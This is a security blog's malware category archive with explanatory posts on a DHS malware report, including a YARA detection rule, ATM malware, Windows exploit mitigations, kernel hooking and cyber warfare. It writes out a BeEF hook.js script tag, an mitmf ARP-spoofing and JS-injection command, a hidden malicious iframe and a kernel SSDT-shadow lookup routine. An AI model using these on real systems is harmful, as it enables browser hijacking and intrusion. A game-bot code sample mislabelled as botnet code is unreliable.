Category Archives: Virus & Malware

Asia, country cyber law, Cyber War, Under our observation, Virus & Malware

About DHS Malware Analysis Report (MAR) – 10135536-B

2 Comments

Preface:

There are books of which the backs and covers are by far the best parts!

― Charles Dickens, Oliver Twist

Discussion details:

Heard that the North Korean government suspected state sponsor of Lazarus Group cyber attack activities. A nick name to Lazarus group dubbed Hidden Cobra exposed to the world mid this year. The US homeland security claimed that they are the suspects of the cyber attack to Sony picture and behind the WannaCry (ransomware) cyber attack. By far we known US homeland security department with high priority to keep track their activities.

DHS malware report (10135536-B) technical findings

There are total 7 items of Portable Executable (PE) files shown on report. We make our discussion in layman terms, say that PE is a executable file. The PE checksum and details shown as below:

  1. PE file name checksum (MD5): C74E289AD927E81D2A1A56BC73E394AB

Antivirus vendor capable to detect checklist

  • K7 – Trojan ( 700000041 )
  • Cyren – W32/Heuristic-KPP!Eldorado
  • VirusBlokAda – BScope.Trojan.Agent

2. PE file name checksum (MD5): FC9E40100D8DFAE2DF0F30A3414F50EC

Antivirus vendor capable to detect checklist

  • Cyren – W32/Heuristic-KPP!Eldorado
  • VirusBlokAda – BScope.Trojan.Agent
3. PE file name checksum (MD5): 0137F688436C468D43B3E50878EC1A1F 
Antivirus vendor capable to detect checklist
  • F-secure – Gen:Trojan.Heur.LP.Tu4@aqf3yp
  • BitDefender – Gen:Trojan.Heur.LP.Tu4@aqf3yp
  • Emsisoft – Gen:Trojan.Heur.LP.Tu4@aqf3yp (B)
4.  PE file name checksum (MD5): 114D8DB4843748D79861B49343C8B7CA
Antivirus vendor capable to detect checklist
  • F-secure – Gen:Variant.Graftor.373993
  • Cyren – W32/Heuristic-KPP!Eldorado
  • VirusBlokAda  – BScope.Trojan.Agent
  • BitDefender – Gen:Variant.Graftor.373993
  • Emsisoft – Gen:Variant.Graftor.373993 (B)

5. PE file name checksum (MD5) 9E4D9EDB07C348B10863D89B6BB08141

Antivirus vendor capable to detect checklist
  • F-secure – Gen:Trojan.Heur.LP.hu4@aKqgOsli
  • BitDefender – Gen:Trojan.Heur.LP.hu4@aKqgOsli
  • Emsisoft – Gen:Trojan.Heur.LP.hu4@aKqgOsli (B)
6. PE file name checksum (MD5)
2950E3741D7AF69E0CA0C5013ABC4209
Antivirus vendor capable to detect checklist
  • F-secure – Trojan.Inject.RO
  • VirusBlokAda – BScope.Trojan.Agent
  • Ahnlab – Trojan/Win32.Akdoor
7.  PE file name checksum (MD5)
964B291AD9BAFA471DA3F80FB262DBE7
Antivirus vendor capable to detect checklist
  • nProtect – Trojan/W64.Agent.95232
  • McAfee – Trojan-FLDA!964B291AD9BA
  • ClamAV – Win.Trojan.Agent-6319549-0
  • Ahnlab – Trojan/Win64.Dllbot
  • Quick Heal – Trojan.Generic
My observation:
It was strange and surprise to me that the total checksum provided by homeland security malware report only 1 item can find the record on virustotal database. It was not usual from technical stand point. The item 7 PE checksum can found on virustotal database. The earlier malware detected period fall back to 2014.  Apart from that  PE file checksum item from 1 to 5 only acknowledge by few antivirus vendor.
As we know, Kapersky pay an important role of APT cyber attack investigation analysis so far. But this time it did shown on report. We understand that there is a lawsuit in between US government and Kapersky.  May be this is the reason. However we couldn’t find any details on virustotal repository. It is very rare! It looks that  F-secure virus vendor done well in this matter since their detection rate is 3 out of 7. On the other hand, the body guard for South Korea government (AhnLab) is the antivirus detect the attack earlier in 2014. However the overall detection performance only maintain on 2 out of 7.
From general point of view, no matter Lazarus Group or Hidden Cobra their design goal looks is their natural enemy if the attack was engaged by North Korean government. However it looks that the major cyber attacks given by Hidden Cobra went to cross bother countries especially USA or European countries. The virus vendor F-Secure hometown in Finland. Their business market coverage in APAC country looks significant reduce in PC market recently. But they are aggressive in mobile phone devices. Perhaps the alert given by Homeland security malware attack target machines are on windows base. And therefore it such away bypass their focus.
It looks confused with managed security services vendor especially APAC country of this cyber alert!
The report given by US homeland security awaken our general opinion for antivirus vendor. Apart of my favor Kapersky  there are potential antivirus contain powerful capability to  detect and quarantine the unknown APT activities and malware. For example on the report we seen the brand name of K7,  Cyren, VirusBlokAda, Emsisoft  and BitDefender.
Anyway  I still have hesitation or hiccups of this report since some information not disclose in normal way. For example, I could not found the history record on virustotal repository. But place safe that following the recommendation provide by DHS is the best practice (Yara rule shown as below):

 

rule Unauthorized_Proxy_Server_RAT

{

meta:

Author="US-CERT Code Analysis Team"

Incident="10135536"

MD5_1 = "C74E289AD927E81D2A1A56BC73E394AB"

MD5_2 = "2950E3741D7AF69E0CA0C5013ABC4209"

Info="Detects Proxy Server RAT"

super_rule = 1

strings:

$s0 = {8A043132C288043125FF00000003C299F73D40404900A14440490003D0413BCF72DE5E5FC3}

$s1 = {8A04318844241432C28804318B44241425FF00000003C299F73D40404900A14440490003D0413BCF72D65E5FC3}

$s2 = {8A04318844241432C28804318B44241425FF00000003C299F73D5C394100A16039410003D0413BCF72D65E5FC3}

$s3 = {8A043132C288043125FF00000003C299F73D5C394100A16039410003D0413BCF72DE5E5FC3}

$s4 = {B91A7900008A140780F29A8810404975F4}

$s5 = {399FE192769F839DCE9F2A9D2C9EAD9CEB9F

D19CA59F7E9F539CEF9F

029F969C6C9E5C9D949FC99F}

$s6 = {8A04318844241432C28804318B44241425FF00000003C299F73D40600910A14460091003D0413BCF72D65E5FC3}



$s7 = {3C5C75208A41014184C074183C72740C3C7474083C6274043C2275088A41014184C075DC}

$s8 = {8B063D9534120077353D59341200722E668B4604663DE8037F24}

$s9 = {8BC88B74241CC1E1052BC88B7C2418C1E1048B5C241403C88D04888B4C242083F9018944240C7523}

$s10 = {8B063D9034120077353D59341200722E668B4604663DE8037F246685C0}

$s11 = {30110FB60148FFC102C20FBEC09941F7F94103D249FFC875E7}

$s12 = {448BE8B84FEC

C44E41F7EDC1FA038BCAC1E91F03D16BD21A442BEA4183C541}

$s13 = {8A0A80F9627C2380F9797F1E80F9647C

0A80F96D7F0580C10BEB

0D80F96F7C0A80F9787F05}

condition:

any of them

}

Reference: The article provided by US Homeland security (see below)
https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF

Summary:

In the meantime, I wish you Merry X’mas and Happy New year. Stay tuned!

Virus & Malware

Descendants of the spyware or malware

Malware activities life not easy since malware detector is common and popular. Even though the malware circumvent the detector but it is hard to bypass the monitor of SOC because of SIEM product. It looks that it limit space for spy or malware to hunt your data. The design weakness of malware is that it requires a static connectivity to C&C. I foresee that the descendants of spyware or malware will deploy similar of  smartphone technology relies on HTTP connection (Setting headers in POST request with Java). The spyware or malware make use of this method is able to dynamic connection to destination. Such method benefits to fool the defense mechanism.  To be honest, send JSON data from the client side is popular today. It is hard to judge. Hacker more focusing on application design weakness is ongoing trend of cyber security world. Should you be interested of related details, please refer to following url for reference.

Layer 7 (application layer) – What is the information security key factors?

2017, cyber security incident news highlight, Virus & Malware

New trend – Botnet infection technique empowered Ransomware infection

1 Comment

Preface:

We known that botneck infection technique popular last few year. The objective of the botneck infection more on DDOS attack. But the status now has been change.

Below sample of code on how botnet operation.

using System.Threading.Tasks;

using log4net;

using Loki.Bot;

using Loki.Common;

using Loki.Game;

 

namespace MapBuddy.Tasks

{

    public class MapExplorationCompleteTask : ITask

    {

        private static readonly ILog Log = Logger.GetLoggerInstanceForType();

 

        public async Task<bool> Logic(string type, params dynamic[] param)

        {

            if (type != "task_execute") return false;

            if (LokiPoe.Me.IsDead || !LokiPoe.CurrentWorldArea.IsMap) return false;

 

            if (CurrentMap.HasBossRoom)

            {

                if (!TrackMobTask.MapBossFound && !TrackMobTask.MapBossDead)

                {

                    Log.Warn("[MapExplorationCompleteTask] insci_test dont allow finish map until boss is alive.");

                    return false;

                }

            }

 

            Log.Warn("[MapExplorationCompleteTask] Now finishing the map run.");

            MapBuddy.EventInvocators.RaiseMapExplorationCompletedEvent();

            await CommunityLib.LibCoroutines.CreateAndTakePortalToTown();

 

            //Second portal if we are

            //if (MapBuddySettings.Instance.Mode == OpenMethod.Laboratory)

            //{

            //    var currentBot = BotManager.CurrentBot;

            //    currentBot.Settings.SetProperty("NeedsTownRun", 2);

            //}

 

            return true;

        }

 

        public string Name => "MapExplorationCompleteTask";

 

        public string Description => "Task for leaving the map.";

 

        public string Author => "ExVault";

 

        public void Start()

        {

        }

 

        public void Tick()

        {

        }

 

        public void Stop()

        {

        }

 

        public string Version

        {

            get { return "1.0"; }

        }

 

        public object Execute(string name, params dynamic[] param)

        {

            return null;

        }

    }

}

Current status:

It looks that an alert shown that an unknown attack counterfeit HSBC email to widespread the infection.  This round of attacks seems focusing on banking industry. Sample counterfeit email display below: Guys be careful!

 

Virus & Malware

Not a sophisticated technique, but it got his way to compromised ATM windows OS machine

5 Comments

Preface:

Not a pulp fiction! Kaspersky Lab found that the latest generation of Malware focus in Bank ATM machine attack operate lightweight and simple. But we known that ATM machine was hardening the connectivity. May be you will be interested? In what way let the machine compromised?

Introduction to Bank ATM malware types (malware found since 2015)

i. Rufus – a malicious code used to clean out ATMs running outdated Windows XP software across states.

ii. GreenDispenser – GreenDispenser attempts to query the microsoft windows registry location (see below) to find the peripheral name for the cash dispenser.

“HKEY_USERS\ .DEFAULT\XFS\LOGICAL_SERVICES\class=CDM”

The malware will make a call to WFSExecute with the command set to WFS_CMD_CDM_DISPENSE” and a timeout of 12000 to dispense cash (see above picture). GreenDispenser capable to execute the sdelete to remove itself from the ATM.

iii. Ploutus – Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message. It could run on ATMs running the Windows 10, Windows 8, Windows 7 and XP operating systems. The attack targer aim to control Diebold ATMs.

iv. SUCEFUL – The (SUCEFUL) malware target design to attacks Diebold and NCR ATMs machines.The malicious code features are capable to do the following:

  1. Reading data from the chip of the card
  2. Control of the malware via ATM PIN pad
  3. Suppressing ATM sensors to avoid detection

v. Skimer – Skimer was distributed extensively between 2010 and 2013. Its appearance resulted in a drastic increase in the number of attacks against ATMs, with up to nine different malware families identified by Kaspersky Lab. The criminal (Skimer) group using social engineering technique implant malware to the ATM system through physical access, or via the bank’s internal network.

Another way to make machine vulnerable especially Windows Operating System

 

  • Infection technique through phishing, embedded malware in MS-word document ,download malware infection file and visit compromised website.
  • Try to infect server especially WSUS server
  • Compromise ATM machines through software path management and ATM application software update
  • ATM windows operating system compromised
  • As a result, the ATM machine might become crazy!

 

Protect Yourself:

It is better to use the ATM machine inside of a bank lobby.

Reference:

Should you have interest to elaborate more, please read below details.

ATM thieves are all in jail. Can you tell me that bank ATM environments are safe now?

Application Development, Virus & Malware

I am a Microsoft OS. Just wonder why I was hacked even though I have protective system?

2 Comments

Preface:

A simple question was asked by kernel? Why I was hacked even though I have comprehensive protective system?

Background:

The windows Operating System development team fully understand relies on market anti virus might not protecting their core OS significantly. Since the computer user not only using Microsoft word processing application. They are allow the 3rd party application vendor run on top of their operating system.
They provides security defense mechanism to 3rd party software developers on their OS products since 2002. Such advanced protective mechanism also apply to windows XP SP2 and windows server 2003.

Introduction – Microsoft Comprehensive protective system for 3rd party application development (cookbook)

Top 3 protection features overview

Stack buffer overrun detection

The Detection  capability was introduced to the C/C++ compiler in Visual Studio .NET.  The /GS switch only inserts checks into function that it “recognizes as subject to buffer overrun problems.

Mitigation scheme – add below instruction in a commonly used header file to increase the number of functions protected by /GS:

#pragma strict_gs_check(on)

Preventing the SEH Overwrites with SEHOP

Structured Exception Handling (SEH) is a Windows mechanism for handling both hardware and software exceptions consistently. In many cases, an attacker will choose to overwrite the exception handler function pointer with an address that contains instructions that are equivalent to a pop reg, pop reg, ret. This allows an attacker to reliably execute arbitrary code by transferring control to the EstablisherFrame that the exception dispatcher passes as the second parameter when calling an exception handler. (see below diagram for reference)

Remark: The SEH overwrite technique uses a software vulnerability to execute arbitrary code by abusing the 32-bit exception dispatching facilities provided by Windows.

Mitigation scheme:

Adding dynamic checks to the exception dispatcher that do not rely on having metadata derived from a binary. This is the approach taken by SEHOP. SEHOP achieves this functionality in two distinct steps.

  1. Insertion of a symbolic exception registration record as the tail record in a thread’s exception handler list.
  2. Ensure that the symbolic record can be reached and that it is valid

Below diagram illustration of this logic:

 

Address space layout randomization (ASLR)

Address Space Layout Randomisation (ASLR) is a technology used to help prevent shellcode from being successful. It does this by randomly offsetting the location of modules and certain in-memory structures. Data Execution Prevention (DEP) prevents certain memory sectors, e.g. the stack, from being executed. By default, Windows Vista and later will randomize system DLLs and EXEs. In order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries. It provides random stack and heap allocations and page load every time a process starts. Even though system process was hacked. The malware cannot execute shellcode theoretically.

Below articles are my research on ASLR topic on Virtual Machine and other operation system . Should you have interest. Please review below articles for reference.

Copy – He is great partner of virtual machine but he can kill VM simultaneously – address space layout randomization

The enemy of ASLR (Address space layout randomization) – memory leak

But why was hacked ?

Technical insight –  It looks that using ASLR feature protect windows OS products are perfect. But the cyber security incident happened from past proven that ASLR is hard to avoid side-channel attack. For instance, the vulnerabilities (CVE-2016-7260 and CVE-2016-7259) could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system. The windows OS system including 2008,2008R2, 2012,2012R2 and 2016.

Another example alert by Microsoft that attackers are using a blend of in-memory malware, legitimate pen-testing tools and a compromised updater to attack banks and tech firms. Similar type of attack was happened on 2013 of several South Korean organizations via a malicious version of an installer from storage service SimDisk.

Below details of information can help you to developing more idea in regards of this matter.

The operating system can promote a driver’s StartType to be a boot start driver depending on the BootFlags value specified in the driver’s INF. You can specify one or more (ORed) of the following numeric values in the INF file, expressed as a hexadecimal value:

  • If a driver should be promoted to be a boot start driver on network boot, specify 0x1 (CM_SERVICE_NETWORK_BOOT_LOAD).
  • If a driver should be promoted on booting from a VHD, specify 0x2 (CM_SERVICE_VIRTUAL_DISK_BOOT_LOAD)
  • If a driver should be promoted while booting from a USB disk, specify 0x4 (CM_SERVICE_USB_DISK_BOOT_LOAD).
  • If a driver should be promoted while booting from SD storage, specify 0x8 (CM_SERVICE_SD_DISK_BOOT_LOAD)
  • If a driver should be promoted while booting from a disk on a USB 3.0 controller, specify 0x10 (CM_SERVICE_USB3_DISK_BOOT_LOAD).
  • If a driver should be promoted while booting with measured boot enabled, specify 0x20 (CM_SERVICE_MEASURED_BOOT_LOAD).
  • If a driver should be promoted while booting with verifier boot enabled, specify 0x40 (CM_SERVICE_VERIFIER_BOOT_LOAD).
  • If a driver should be promoted on WinPE boot, specify 0x80 (CM_SERVICE_WINPE_BOOT_LOAD).

Windows registry:  Turn on/off ASLR feature: (see below)

ASLR by setting HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages

Summary:

ASLR does not affect runtime performance. However it might slow down the initial loading of modules. But it is not in full capability to protect your windows OS system.

A reminder . Do not ignore unimportant item.

 

 

System, Uncategorized, Virus & Malware

Assurance level of 3rd party software – Part 1

6 Comments

Preface

As we know google did the 3rd party application assurance last few months. Their objective is intend to fight against unknown malicious code embedded in software.

Hidden malicious code history

Metamorphic code (Win32/Simile)  was born on 2002 written in assembly language which target Microsoft software operating system products. As time goes by, the 2nd generation of metamorphic code capable changing what registers to use, changing flow control with jumps, changing machine instructions to equivalent ones or reordering independent instructions.

*Metamorphic code can also mean that a virus is capable of infecting executables from two or more different operating systems (such as Windows and GNU/Linux) or even different computer architectures.

Malware/RootKit infection from software device driver to Smartphone

A revolution of technology world on 2007 driven by Apple iPhone and Android. Thus such a way driven malware and rootkit re-engineering their architecture. As a result, their implant destination not limit on device drive itself. It also includes smartphone 3rd party application.

Part 1 – Microsoft OS products, rooting your software driver technique overview 

An important step lets the hacker do the hook or infiltrate job is to identify the usable memory space.  A parameter so called KeServiceDescriptorTableShadow. Using KeServiceDescriptorTable variable exported by ntoskrnl.exe, we can get the address of KeServiceDescriptorTableShadow variable. KeServiceDescriptorTableShadow is an extension of
KeServiceDescriptorTable variable.

Below syntax get the address of KeServiceDescriptorTableShadow by comparing memories around KeServiceDescriptorTable.

typedef struct _SERVICE_DESCRIPTOR_TABLE { PULONG ServiceTable; // array of entry-points PULONG puCounterTable; // array of counters ULONG uTableSize; // number of table entries PUCHAR pbArgumentTable; // array of byte counts } SERVICE_DESCRIPTOR_TABLE, *PSERVICE_DESCRIPTOR_TABLE;

Below syntax is retrieves its address in different version of Windows.

PSERVICE_DESCRIPTOR_TABLE QuerySDTShadow()
{
 ULONG Index;
 PUCHAR SDTShadow;
 UONG MajorVersion, MinorVersion, BuildNumber;
 UNICODE_STRING &CSDVersion;
 PsGetVersion(&MajorVersion, &MinorVersion, &BuildNumber, &CSDVersion);
 __try
 {
 if(MajorVersion == 5 && MinorVersion == 1) // Windows XP
 SDTShadow = (PUCHAR)((ULONG)&KeServiceDescriptorTable - 0x40);
 else // Windows 2000, or Windows Vista
 SDTShadow = (PUCHAR)((ULONG)&KeServiceDescriptorTable + 0x40);
 for(Index = 0; Index < 0x1000; Index ++, SDTShadow ++)
 {
 KeServiceDescriptorTableShadow = (PSERVICE_DESCRIPTOR_TABLE)SDTShadow;
 if(KeServiceDescriptorTableShadow == &KeServiceDescriptorTable)
 continue;
 if(memcmp(KeServiceDescriptorTableShadow, &KeServiceDescriptorTable, 0x10) == 0 
 && ((UCHAR)KeServiceDescriptorTableShadow->ServiceTable & 3) == 0)
 {
 return (PSERVICE_DESCRIPTOR_TABLE)SDTShadow;
 }
 }
 return NULL;
 }
 __except(1)
 {
 return NULL;
 }
}

Below details on the picture left hand side show you the step how to relies on driver hook into the kernel process. In end-user point of view, there is a simple way to identify the current driver load into your PC or server. You just execute a command fltmc in your MS-DOS prompt. There is not require any assembly language knowledge. It is a simple and direct path to let you know how many 3rd party driver load into the windows kernel. For more details, please refer to right hand side in below picture.

 

Hacker is difficult to find available address space due to ASLR technique. (see below URL for reference)

The enemy of ASLR (Address space layout randomization) – memory leak

Even though ASLR has design limitation might have possibility let hacker implant malware. However a better idea is that take easy way instead of difficult way. A way confirm that it is possible. From technical point of view, ASLR avoid hacker know the actual memory address.  How about run the malicious code driver and ASLR mechanism at the same time (simultaneously).That is pre-install a 3rd party driver with malicious code embedded then load the software driver during operating system startup. The way similar antivirus product using API hooking allows the antivirus to see exactly what function is called.

- Loading drivers
- Starting new processes
- Process executable image
System DLL: ntdll.dll (2 different binaries for WoW64 processes)
- Runtime loaded PE images – import table, LoadLibrary, LoadLibraryEx[1], NtMapViewOfSection

Antivirus software may use SSDT hooking (System Service Dispatch Table hooking) on 32-bit operation.  On a 64-bit system, a KM (kernel module) driver can only be loaded if it has a digital signature. And therefore hacker could be focus on 32 bit OS instead of 64 bit.

How to run 32-bit applications on x64?

In order to maintain complete code separation, running 32-bit code on a 64-bit operating system design with a destinate folder named \Windows\SysWOW64 that is used to store the 32-bit DLLs to meet the design objective. Meanwhile the x64 version of Windows uses the \windows\system32 folder for 64-bit DLLs. Below diagram shown that the WOW64 emulator responsible for file system redirection for several key components of the Windows operating system.

To identify 32 bit and 64 bit environment changes depending on the registry key. For instance, the ‘rundll32’ is point to the specify registry (HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\CurrentVersion\Run).

Therefore it will execute the following command.

C:\Windows\SysWOW64\rundll32.exe

This is the 32-bit version program thus everything will be remapped accordingly (see below diagram for reference)

Above details shown the registry and file redirection mechanism to execute 32 bit application on 64 bit of operating system. It looks fine that application not possible to work with incorrect bits environment since it governance by registry. However a fundamental design architecture looks provide benefits to the hacker (see below diagram for reference):

Above diagram indicated that software device driver module allow 32-bit software driver go thought module (WOW64) communicate with 64-bit Kernel function. So it has possibility go through the software driver then compromise the system. From security point of view, the server or workstation Antivirus processes will keep track all DLL activities on directory (c:\windows\SysWoW64). So what is the malware next action?

Malware next action

A lot of security experts feedback comments on Microsoft OS products. They highlight that a flaw appears on kernel side. Microsoft official announcement was told that it is not a security issue.  The fact is that  malware can use API system call (PsSetLoadImageNotifyRoutine) to trick the OS into giving malware scanners other files. This would allow malicious software smuggling then by evade antivirus monitoring. A hacking technique so called Register load image callback (see below)

PsSetLoadImageNotifyRoutine

How to prevent PsSetLoadImageNotifyRoutine

Microsoft have solution available against register load image callback flaw. Developer can define a minifilter (FltGetFileNameInformationUnsafe) to confirm the routine returns name information for an open file or directory. And therefore it is the way to avoid the fundamental design limitation of API system Call mechanism (PsSetLoadImageNotifyRoutine).

But what is the causes for system developers not intend to use this preventive mechanism.

FltGetFileNameInformationUnsafe allocates it’s own memory for the structure. As a result it will encountered blue screen and system crash once 3rd party software driver not follow the SDLC (software development life cycle).

Alternative type of attack  (This time does not intend to discuss in detail)

A rootkit will create a hidden partition, at the end of the drive, 1 – 10 MB in size and set itself as the boot partition. Hence, the rootkit is already running before Windows loads. This hidden partition will not show up on Windows Disk Management in most cases.

Rootkit categories:

Operation feature

Persistent rootkit is one that is activated every time the system starts up.

Non-persistent rootkit is not capable of automatically running again after the system has been restarted.

Operation mode

User mode: this kind of rootkit hooks system calls and filters the information returned by the APIs (Application Programming Interface)

Kernel mode : these rootkits modify the kernel data structures, as well as they hook the kernel’s own APIs. It compromise the antivirus program at the same time. This is the most reliable and robust way of intercepting the system.

Summary:

Even though your IT infrastructure install full scope of detective and preventive control facilities. The 3rd software driver will broken your security facilities. Perhaps you have SIEM and central log event management product however such malicious activities is hard to detect since it is running in Kernel (Ring 0).  So a standard policy on software usage is critical goal on today cyber technology world. Believe it or not, a 3rd party software driver embedded malicious code can break your great wall.

 

 

 

 

 

 

 

Virus & Malware

The incentive of caching & Web browser exploitation – Hacker benefit

3 Comments

 

Preface

Bring up hypothesis boldly while prove it conscientiously and carefully.  We hypothesis cyber criminal case objective to steal the data. The gatekeeper is the credential. For instance user password. We known that the enhancement of authentication was added to specifics technology. Yes, it is a personal electronic certificate. Do you think whether the criminal will be focused on client side since it will be more easy to collect the information?

Concept of theory – according to BeEF (The Browser Exploitation Framework Project)

Hook the web browser are operating in two different technique. They are ….. (see below):

 

BeEF ( Browser Exploitation Framework)

The BeEF hook is a JavaScript file hosted on the BeEF server  that needs to run on client browsers. The hook mechanics looks straight forward that it embedded parameters (see below) on a web page lure victim execute (click). It re-direct the victim connection to BeEF server afterwards. As a result it can collect the information on browser includes the credential.

<script src=”http://192.168.xxx.xxx:3000/hook.js” type=”text/javascript”></script>

Reminder: BeEF is a platform which you can use to generate and deliver payloads directly to the target web browser. The BeEF attack tool is written in the Ruby programming language.

 

MITMf (man in the middle attack framwork)

Hacker can make use of different tool to do the MITM. BeEF server contained the specific feature. Below simple idea of script objective injected the hook.js script into the websites that the target visited.

mitmf --spoof --arp -i <interface> --gateway <router IP> --target <target IP> --inject --js-url <hook.js URL>

Reminder: An MITM attack is only possible if you have control over the network between the victim and server.

What  is the incentive in between hook and cache?

We known that our web browser contained many information. Even though you do not save the password and user ID. However web surfing history will be recorded until you clear manually or purge the data by configuration setting. Human will be step down their alert until incident happen. So sometimes it provides a way to bad guy doing some jobs silently. Let’s take a closer looks of our assumption.

Our virtual reality assumption
  1. See below diagram (wan accelerator architecture and handshake diagram), hook the browser can investigate the traffics and do a passive information gather to receive the understand of the operation peers.

WAN accelerator architecture and handshake diagram

Network caching technology conceptual diagram

2. Network caching technology is hard to avoid vulnerability occurs. For instance CVE-2017-7307 proof that Riverbed RiOS before 9.0.1 does not properly restrict shell access in single-user mode, which makes it easier for physically proximate attackers to obtain root privileges and access decrypted data by replacing the /opt/tms/bin/cli file.

3. We understand that this is an vendor appliance design OS design limitation. However hacker can relies on hook to the browser advantage learn the details and find their target. They can relies on  this vulnerability do more works to steal the information.  A malware out break to more client machine might happen in such circumstances (see below picture – Cache system has been compromised) since the data contained in cache has been compromised.

Cache system has been compromised

Summary:

To setup a comphensive prevention detection system, priority to do is know how to hack. Since hacker might know what is the benefits on their side. As a matter of fact a enterprise stated that they employ hacker to become thier cyber security team member. My observation is that IT security industry looks changing the shape. The security team key responsibility is doing report creation works, project and vendor management on projects. But this is not the way!

 

 

 

 

 

Virus & Malware

About apple Mac security topic – Does it a Trojan horse or administrator negligence?

3 Comments

Attention:

In regards to the subject matter, below details is a short discussion and therefore not require to written in details long form. Enjoy!

Preface:

Once upon a time. The Greek army going to breakthrough the Troy city defense mechanism. A group of army  hide themselves inside a horse…….

Discussion topic – malware bypasses gatekeeper 

Sound strange! Heard that the malware can bypass apple computer detection mechanism, said macdailynews. It is hard to imagine that how’s the hacker can do this magic?

http://macdailynews.com/2017/04/28/nasty-mac-malware-bypasses-apples-macos-gatekeeper-undetectable-by-most-antivirus-apps/

As far as I know, similar scenario type of cyber attack aim to bypass defense mechanism was happened in past. But it is a non apple OS platform. Hacker relies of iframe programming technique (see below program syntax). The method is that hacker is going to find a vulnerable web site which did not have implement content security control. They will embeds a malicious iframe code snippet in this website page. When anyone visits that page, the hidden iframe code secretly downloads and installs a Trojan or a malware such as key-logger on the unsuspecting user’s computer, if his computer is not adequately protected. The web site will unintended become a malicious host in the long run if the web admin not aware. As a result the host will be include in the abuse by internet community and put his domain record into black list.

Program syntax

<iframe src="http://unknown.com/iframe-attack.php" width=100% height=0></iframe>

Remark: Some sort of vulnerability scanner evaluate the iframe attack and categorize in medium severity.

Do you think there is a need to change the severity level now?

Malicious code embedded on enterprise certificate file

We kno wn that generate ecert is a straight forward process. The server administrator generate a CSR file on server side. Then SSL certificate vendor provides the certificate files afterwards according to CSR file. From technical point of view, the contents contains in certificate file is not a human readable language. And therefore web server administrator less check the details in general circumstances. It is hard to imagine that bad guy relies on this matter to do the criminal work. For example, embedded code in the certificate file. The benefits is that this malicious activities will be protected by default encryption mechanism. The malicious traffic will be pass through the defense mechanism cross check. And such away fooling the detection and preventive control .

Sample: Below SSL enterprise certificate file indicate that the application can install additional apps that were signed with this certificate. In the sense that it can bypass defense mechanism by Apple.

Summary:

As we know, information security is a continuous program. Above 2 risk items (iframe attack (Clickjacking) and e-cert embedded with abnormal program syntax) bring the following idea for our reference.

1. Do not ignore the vulnerability management program about iFrame vulnerability

2. During the e-cert installation, a better idea to use online tools to verify the e-cert. You can find the online verification tools on internet. For example: Symantec

 

Application Development, Cell Phone (iPhone, Android, windows mobile), IoT, System, Virus & Malware

The other side of the story on cyber attack (Electronic war between countries)

389 Comments

Preface

We heard  that the new age transformation is coming.  As a result it transform the traditional military weapons to electronic codes. The computer  technologies such as DDOS (Distributed denial of services), malware and virus similar a killer. It can disrupt the financial activities,  daily network communication and health care services. An idea bring to our attention on world war II history was that classic military power result destroyed everything (mankind and properties).  But re-built the society and operation after war. It is a harsh and difficult mission! From technical point of view, the victorious might stand on ethics view point to assists defeated side to rebuild the business and economic system. As a matter of fact, the distruction level of war created by military weapon especially missile it is hard to evaluation. And this is the reason let’s cyber warfare appears in coming future! But it started already!

Analytic result on technical articles about cyber warfare

In regards to my study on technical article issued by CSS Eth Zurich (The Center for Security Studies (CSS) at ETH Zurich).The analytic result highlights serveral key factors of Cyber warfare . Cyber warfare was cheaper than traditional military force. It provides a  “cleaner” (with less or no bloodshed) suitation. No doubt that  less risky for an attacker than other forms of armed conflict. The analytic result  defines 5 different types of cyber conflict during their study. They are Cyber War, Cyber Terrorism, Cyber Espionage, internet crime and cyber vandalism.

The specific feature of cyber weapon (in between country to country)

I was sometimes confused with the headline news on prediction on cyber technology war.  The questions on my mind is that how electronic weapon or cyber weapon replacing traditional military facilities? Think it over, the appropriate technique might adopted target into the following criteria (see below):

The capabilities of cyber attack techniques ( A transformation of traditional military force)

Type Attack technology Functional feature – objective Target – Environment Remark:
Cyber Vandalism, Cyber War IOT & BOTNET (DDOS technique) Services suspension – electronic communication services (IP-Telephony) Bank, Fund House , Stock Exchange
Cyber Espionage Malware Information gathering Bank, Fund House, Stock Exchange & government sector
Cyber War, Cyber Vandalism Ransomware Services suspension important facility fucntion nuclear facility , Airlines,TV broadcast station, Radio broadcast station & military facility Ransomware feature contained facility to supspend the computer services. Besides it capable listen to the instruction of C&C server. On the other hand, the attacker can resume the services once they win the battle.
Traditional military force Bomb Services Suspension on important facility function and destroy permanently nuclear facility, military facility, power station, airport & communiation facility (Digital phone system)
Internet Crime, Cyber war Email phishing and Scam email message Carry out  psychological warfare, implant malware activities in order to fulfill their objective nuclear facility, military facility, power station,

Let us dig out one of the attack technique to see how the cyber technology feature fulfill the goal of the cyber warfare features .

Do you think Ransomware is founded by military department?

The first ransomware appear in the world on 1989. A biologist Joseph L. Popp sent 20,000 infected diskettes labeled
“AIDS Information – Introductory Diskettes” to attendees of the World Health Organization’s international AIDS conference.
But after 90 reboots, the Trojan hid directories and encrypted the names of the files on the customer’s computer.
To regain access, the user would have to send $189 to PC Cyborg Corp. at a post office box in Panama.

In 2006, former President George W. Bush was increasingly worried about Iranian efforts at enriching uranium, and ultimately, its hopes to build an atomic bomb. The goal of Stuxnet is going to destroy Iraq nuclear facilities driven by US government. The rumors were told Stuxnet malware destroyed roughly one-fifth of Iran’s centrifuges in 2009.

An unconfirmed  information stated that there is a separate operation called Nitro Zeus, which gave the US access into Iran’s air defense systems so it could not shoot down planes, its command-and-control systems so communications would go dead, and infrastructure like the power grid, transportation, and financial systems.

Speculation:

WannaCry infection using EternalBlue, an exploit of Windows’ Server Message Block (SMB) protocol.  The U.S. National Security Agency (NSA) had discovered the vulnerability in the past, but used it to create an exploit for its own offensive work, rather than report it to Microsoft. As we know nuclear power facilities control system OS platform relies on Microsoft OS system (see below articles). It may causes people think is there any secret action hide by NSA (National Security Agency). He aroused my interest in questioning who is the key figure to spread WannCry ransome? It looks that there is similarity with Stuxnet worm infection in 2009. Since we all fool by NSA at that time let your computer workstation transform to a cyber army then attack USA enemy.  Do you think wanncry is the rehearsal of test or pilot run?

Malware vs. nuclear power: Do you think SCADA system is the culprit of attack on nuclear power system?

